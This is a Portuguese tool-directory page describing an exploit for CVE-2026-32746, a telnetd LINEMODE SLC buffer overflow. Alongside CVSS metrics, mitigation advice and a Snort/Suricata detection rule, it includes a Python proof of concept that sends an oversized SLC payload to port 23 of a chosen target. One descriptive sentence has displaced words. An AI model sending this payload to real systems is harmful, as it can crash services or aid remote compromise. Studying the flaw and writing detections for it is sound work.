Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-32746 — Prova de conceito de exploit para CVE-2026-32746, uma vulnerabilidade crítica de execução remota de código no GNU Inetutils telnetd via estouro de buffer SLC do LINEMODE. Inclui análise técnica, métricas CVSS e orientações de mitigação. | Kitploit
Ferramentas/GitHubGitHub/kaleth4/cve-2026-32746
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoRed Teaming
GitHubkaleth4/cve-2026-32746

CVE-2026-32746

Prova de conceito de exploit para CVE-2026-32746, uma vulnerabilidade crítica de execução remota de código no GNU Inetutils telnetd via estouro de buffer SLC do LINEMODE. Inclui análise técnica, métricas CVSS e orientações de mitigação.

Ver Repositório
há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🚨 CVE-2026-32746 GNU Inetutils Telnetd RCE

🔥 📌 Resumo Executivo

Vulnerabilidade Crítica | CVSS 9.8 | Execução Remota de Código! Afeta: GNU Inetutils Telnetd (versões anteriores a 2.7) Tipo: OOB Write no manipulador de subopções LINEMODE SLC Vetor de Ataque: Rede (Porta 23) | Sem autenticação necessária Impacto: RCE com privilégios do processo Telnetd


🎯 📖 Descrição Técnica

Foi identificado um estouro de buffer por escrita fora dos limites (OOB Write) na função add_slc do daemon do . Esta falha permite que um atacante remoto por meio da manipulação das do protocolo Telnet.

telnetd
GNU Inetutils
injete código arbitrário
subopções SLC (Set Local Characters)

🔍 Detalhes Principais

  • Função Vulnerável: add_slc (processamento de caracteres locais).
  • Causa Raiz: Falta de validação de limites no buffer interno.
  • Exploração: Envio em massa de sequências maliciosas LINEMODE SLC.
  • Requisitos: Nenhum (acesso direto à porta 23).

🛠️ 💻 Prova de Conceito (PoC)

Um atacante pode explorar esta vulnerabilidade por meio de um payload Telnet malicioso que satura o buffer interno:

root@kitploit:~
#!/usr/bin/env python3
import socket
import sys

# CVE-2026-32746 - LINEMODE SLC Overflow
# IAC SB LINEMODE SLC <list> IAC SE
IAC  = b'\xff'
SB   = b'\xfa'
SE   = b'\xf0'
LINEMODE = b'\x22'
SLC  = b'\x03'

target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"

# Payload gerado para estourar add_slc
malicious_slc = b"\x01\x03\x41" * 600  # Repetição de 600 vezes

payload = IAC + SB + LINEMODE + SLC + malicious_slc + IAC + SE

print(f"[*] Enviando payload malicioso para {target}...")
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((target, 23))
    s.sendall(payload)
    print("[+] Payload entregue. Verificando queda do serviço/RCE...")

⚠️ ¡AVISO! Este código é apenas para fins educacionais e de pesquisa. Seu uso em sistemas sem autorização é ilegal.


📊 📈 Métricas de Risco (CVSS 3.1)

MétricaValorDescrição
VetorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HRemoto, sem autenticação
Pontuação9.8 (CRÍTICO) 🔴Alto impacto na confidencialidade, integridade e disponibilidade
Publicação13 de março, 2026Última modificação: 5 de maio, 2026

🛡️ 🔒 Mitigação e Soluções

🚀 Solução Imediata

✅ Atualizar o GNU Inetutils para a versão corrigida (pós-2.7).

⚡ Workarounds

🔹 Desabilitar o telnetd e migrar para SSH (recomendado). 🔹 Bloquear a porta 23 em firewalls de perímetro. 🔹 Configurar IDS/IPS para detectar sequências LINEMODE SLC anômalas.

🛡️ Configuração de Segurança Adicional

  • Regras Snort/Suricata:
    root@kitploit:~
    alert tcp any any -> any 23 (msg:"CVE-2026-32746 - LINEMODE SLC Overflow"; content:"|FF FA 22 03|"; depth:5; threshold:type both, track by_src, count 1, seconds 1; sid:1000001; rev:1;)
    
Baixar ferramenta